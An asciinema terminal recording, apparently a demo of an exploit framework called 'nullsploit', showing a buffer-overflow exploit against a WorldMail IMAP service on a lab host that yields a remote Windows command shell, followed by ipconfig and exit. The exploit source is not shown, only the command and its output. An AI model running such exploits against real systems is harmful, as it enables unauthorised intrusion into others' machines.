{"version": 2, "width": 115, "height": 27, "timestamp": 1556839458, "env": {"SHELL": "/bin/bash", "TERM": "rxvt-unicode-256color"}}
[0.108741, "o", "\u001b[1m\u001b[38;5;0m[\u001b[1m\u001b[38;5;1mroot@thexero \u001b[1m\u001b[38;5;7mnullsploit\u001b[1m\u001b[38;5;0m]$ \u001b[m\u001b(B"]
[0.814391, "o", "p"]
[1.01439, "o", "y"]
[1.222423, "o", "t"]
[1.310422, "o", "h"]
[1.446394, "o", "o"]
[1.526484, "o", "n"]
[1.758507, "o", " "]
[2.03836, "o", "e"]
[2.278385, "o", "x"]
[2.406337, "o", "p"]
[2.550442, "o", "l"]
[2.742359, "o", "s"]
[3.013168, "o", "\u0007"]
[3.406339, "o", "\b\u001b[K"]
[3.556654, "o", "\u0007"]
[3.557277, "o", "oit"]
[4.030442, "o", "s"]
[4.260695, "o", "/"]
[5.478341, "o", "r"]
[5.534477, "o", "e"]
[5.779684, "o", "mote/"]
[6.110562, "o", "w"]
[6.278341, "o", "i"]
[6.382498, "o", "n"]
[6.488129, "o", "dows/"]
[6.822304, "o", "w"]
[6.990894, "o", "o"]
[7.12549, "o", "rldmail/"]
[7.614411, "o", "i"]
[7.814259, "o", "m"]
[7.998738, "o", "ap4.py "]
[8.478252, "o", "-"]
[8.630363, "o", "-"]
[8.966297, "o", "r"]
[9.086241, "o", "h"]
[9.182267, "o", "o"]
[9.222303, "o", "s"]
[9.374315, "o", "t"]
[9.494291, "o", " "]
[10.158313, "o", "1"]
[10.462203, "o", "7"]
[10.630269, "o", "2"]
[10.790184, "o", "."]
[10.950289, "o", "1"]
[11.254388, "o", "6"]
[11.462357, "o", "."]
[11.718361, "o", "2"]
[11.950175, "o", "4"]
[12.158342, "o", "0"]
[12.470616, "o", "."]
[12.718337, "o", "1"]
[12.950441, "o", "2"]
[13.118264, "o", "9"]
[13.782189, "o", "\r\n"]
[14.02826, "o", "\u001b[1;33;40m Automatic target selection\u001b[0;37;40m\r\n"]
[14.040168, "o", "\u001b[1;32;40m [+] Target appears exploitable\u001b[0;37;40m\r\n"]
[14.046067, "o", " Connecting to 172.16.240.129 on port 143\r\n"]
[14.047141, "o", " Sending evil buffer\r\n"]
[14.047333, "o", " Waiting for exploit to finish"]
[15.047354, "o", " 4"]
[16.048389, "o", " 3"]
[17.049423, "o", " 2"]
[18.050663, "o", " 1"]
[19.051416, "o", "\r"]
[19.051616, "o", "                                      \r\u001b[1;32;40m [+] Connecting to our shell!\u001b[0;37;40m\r\n"]
[19.055777, "o", "\u001b[1;32;40m [+] Got our shell!\u001b[0;37;40m"]
[19.055924, "o", "\r\n\r\n"]
[19.128927, "o", "Microsoft Windows [Version 10.0.17134.1]"]
[19.129401, "o", "\r\r\n(c) 2018 Microsoft Corporation. All rights reserved.\r\r\n"]
[19.129718, "o", "\r\r\n"]
[19.130043, "o", "C:\\Windows\\system32>"]
[20.726349, "o", "i"]
[20.910207, "o", "p"]
[21.110105, "o", "c"]
[21.206132, "o", "o"]
[21.278174, "o", "n"]
[21.382075, "o", "f"]
[21.510084, "o", "i"]
[21.606102, "o", "g"]
[21.790231, "o", "\r\n"]
[21.864525, "o", "ipconfig\r\r\n"]
[21.88981, "o", "\r\r\nWindows IP Configuration\r\r\n\r\r\n"]
[21.897051, "o", "\r\r\nEthernet adapter Ethernet0 2:\r\r\n\r\r\n"]
[21.897355, "o", "   Connection-specific DNS Suffix  . : localdomain\r\r\n"]
[21.897505, "o", "   Link-local IPv6 Address . . . . . : fe80::3024:1761:ff72:aa0e%7\r\r\n"]
[21.897728, "o", "   IPv4 Address. . . . . . . . . . . : 172.16.240.129\r\r\n"]
[21.897923, "o", "   Subnet Mask . . . . . . . . . . . : 255.255.255.0\r\r\n"]
[21.898071, "o", "   Default Gateway . . . . . . . . . : \r\r\n"]
[21.901279, "o", "\r\r\n"]
[21.901428, "o", "C:\\Windows\\system32>"]
[22.798099, "o", "e"]
[23.062103, "o", "x"]
[23.246129, "o", "i"]
[23.390147, "o", "t"]
[23.542202, "o", "\r\n"]
[23.661391, "o", "exit\r\r\n"]
[24.158411, "o", "Socket closed!\r\n"]
[24.175773, "o", "\u001b[1m\u001b[38;5;0m[\u001b[1m\u001b[38;5;1mroot@thexero \u001b[1m\u001b[38;5;7mnullsploit\u001b[1m\u001b[38;5;0m]$ \u001b[m\u001b(B"]
